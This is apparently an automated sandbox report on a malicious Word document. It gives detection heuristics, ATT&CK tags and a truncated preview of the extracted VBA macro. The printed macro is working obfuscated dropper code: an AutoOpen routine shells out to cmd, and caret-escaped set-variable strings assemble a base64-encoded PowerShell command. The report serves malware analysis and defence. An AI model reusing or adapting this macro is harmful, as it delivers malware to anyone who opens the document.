Verdict: MALICIOUS (Risk Score 242)

Malware Insights

MITRE ATT&CK:

- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample contains a VBA macro with an AutoOpen function that uses the Shell() function to execute a command. The script concatenates strings to build that command, including what appears to be a path to 'cmd.exe' and potentially a PowerShell execution command. This indicates the document is designed to download and execute a secondary payload.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6574595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6574595-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12535 bytes |

SHA-256: 4dd950232ee36c2d1acd6cbf156a6aaf843ce6118395e23373e8af3178529d9c
Preview script (first 1,000 lines of the extracted script; the preview is truncated at the end):

```vb
Attribute VB_Name = "IfhfpDUmuwzzzA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function OHkoN()
On Error Resume Next
wuMOk = Hex(BiwzMp + Hex(wGkZAw) * 74209 + Round(LjcDSn))
pVVEf = Cos(zvDIOO)
OoTsNI = CDate(RdmUpM)
lKjLS = Cos(vocdI)
swKhQ = Hex(hEaWPk + Hex(JFpLjB) * 27236 + Round(YOkTz))
NmZMpk = Cos(QiGwV)
IHsOuz = CDate(IvGct)
upTkZN = Cos(qUSBK)
OHkoN = KUvYdjF + Shell(fhQmV + Chr(EIzsLL + vbKeyC + IjwUJWRX) + aSBTlbphvKD + wjrXCqsQ + VhHLjrpH + uSwztR + QHjSUdlF + TwzviTll + GtFOjj, 97639 - 97639)
zltWiP = Hex(TFMfz + Hex(UcnSjw) * 36809 + Round(qOwwh))
CroprE = Cos(zkPYX)
iJodn = CDate(jsrDCl)
rNJXw = Cos(BjMcR)
End Function
Sub Autoopen()
On Error Resume Next
ouVVr = Hex(tIjoD + Hex(kJMzq) * 21202 + Round(mDmNHp))
TAWjS = Cos(WGzrOX)
fIcVCJ = CDate(mnMDq)
ofSCh = Cos(fiEtl)
OHkoN
VWidJ = Hex(iSLId + Hex(QKwhaj) * 76698 + Round(qRsqo))
JAsUbP = Cos(ShmcId)
UXpfCr = CDate(WPzDYF)
MDiop = Cos(Lharj)
End Sub
Attribute VB_Name = "kwdLERCzw"
Function aSBTlbphvKD()
On Error Resume Next
YREzkX = Hex(vRDZp + Hex(wFJKRL) * 635 + Round(VFOiRw))
VfcSEz = Cos(zqYbwZ)
pkoWtC = CDate(puGRn)
CLqQSY = Cos(ZmbHlC)
jJTGjpjv = "md JN" + "sXYTk qTFmKR" + "niBkYWF" + "dWXd zIAt" + "up" + "ls"
ITmqP = Hex(LfVZLY + Hex(HfkWBQ) * 16845 + Round(mzHIXl))
DJhlq = Cos(MWIQBN)
XqQFtc = CDate(tBFGVt)
WTihr = Cos(LbLsah)
zpIlWSrP = "liid & " + "%^c^o^m^S^p" + "^E^c^%" + " %^c^o^m"
vJcFzC = Hex(TvjCOv + Hex(GCEbP) * 94201 + Round(pCdjKY))
viYiM = Cos(lkYzGT)
sakbS = CDate(lEZHRL)
JFHzWp = Cos(OYRKYC)
XVjtY = "^S" + "^p" + "^E^c^% " + " /V /" + "c " + "set %l" + "wulVj" + "Pqa"
SWdEU = Hex(jvPSCR + Hex(nNVWH) * 36865 + Round(UjcZcR))
wUJZDP = Cos(ShvCwO)
OpowF = CDate(rBCuDF)
vltEcC = Cos(kaGsw)
vBzzQVXc = "FYFdhv%=DkV" + "zvkmMqaLw&&set " + "%aHtuI" + "TldHPow%=p&&s"
iUfaT = Hex(EZGqn + Hex(XqzwSO) * 43399 + Round(nkjnra))
HQojww = Cos(tWWca)
ACpvFb = CDate(MKnIr)
AOwnr = Cos(tRzIRG)
XwhMbAYKnlb = "et %" + "dfVzrMrFqcAOj%" + "=o" + "^w" + "&&set %ZYBDXG" + "Sac" + "THpImI%=ju"
iTzaap = Hex(izluli + Hex(Vjwdf) * 84526 + Round(wpujft))
bDtXoO = Cos(lPjNSD)
CdDCJS = CDate(kAfmP)
jiCrv = Cos(GCtsWz)
clzWpR = "PNuEoBIii" + "AL&&set %jNKzwa" + "pr%=!%aHt" + "uITldHPow%!&&se"
aSBTlbphvKD = jJTGjpjv + zpIlWSrP + XVjtY + vBzzQVXc + XwhMbAYKnlb + clzWpR
End Function
Function wjrXCqsQ()
On Error Resume Next
SjRMP = Hex(oivMr + Hex(WbJrDN) * 71189 + Round(wRHNs))
WzoIk = Cos(EpzoSn)
aaikS = CDate(KZVwL)
flYXBc = Cos(Uzqqt)
qnKqI = "t %hvvV" + "SQB" + "DUiXOUEj%=jqIcu" + "cvKzB" + "V&&set %hiw" + "OOjQfiL%=e^r" + "&&set %BzCtblza" + "nvz%=!%dfVz" + "rMrFqcAOj%!&"
bKchbV = Hex(PzKwN + Hex(pCisAB) * 55972 + Round(FvjRz))
OTRkk = Cos(zqBisu)
nahaZJ = CDate(mBmFp)
QUVOvP = Cos(JJwfaO)
zKnTuzknjZG = "&s" + "et %dCrJQmIii" + "%=s&&s" + "et %kAvsXSOuY" + "LUqWHo%=Mswaz"
iwAzA = Hex(aprYU + Hex(HcZMj) * 24519 + Round(uYcVmm))
QRddCA = Cos(lmnBm)
iPadz = CDate(oHBkwQ)
jTzGd = Cos(NXqJM)
aQqoZJj = "FXco&" + "&set %ikXdRG" + "djit" + "%=he" + "&&set %Yz" + "Ez" + "JAaPZzA%=ll&&!%" + "jNKzwapr%!!%"
VUvWp = Hex(LuIMfw + Hex(XrzVPj) * 62989 + Round(jUslj))
mYjsG = Cos(Pbatk)
wkVKT = CDate(BGGWPC)
cfzmAD = Cos(JcZVbU)
HAHbSupOvRc = "BzCtblz" + "anvz%!!%hi" + "wOOjQfiL%" + "!!%dCrJQ" + "mIii%!!%ikXdRGd" + "jit%" + "!!%YzEzJA" + "aP" + "ZzA%! -e KAB" + "uAEUAdwAtAE8"
jjvRE = Hex(DivsZA + Hex(jZDQI) * 58223 + Round(diQpa))
zBWLAj = Cos(ORXKEL)
XujHM = CDate(zBkYJM)
DvATGr = Cos(lBLkr)
cDGEjZim = "AYgBKAEUA" + "Yw" + "B0AC" + "AAIABpAE8AL" + "gBjAE8ATQBQA" + "HI" + "AZQBTAHMAa" + "QBPAE4" + "ALgBEAGUARg"
ApSCsL = Hex(MsjzIc + Hex(qwRzCn) * 73628 + Round(TRDENw))
VizPXz = Cos(jhfzP)
KMBLdR = CDate(mkOhE)
EWAwo = Cos(AfXBzs)
tAThjT = "BsAEEA" + "dABlAFMAdA" + "ByAEUAQQBNAC" + "gAIABb" + "AEkATwAuAE"
ahPjR = Hex(YBlHP + Hex(avYulU) * 33691 + Round ... (truncated)
```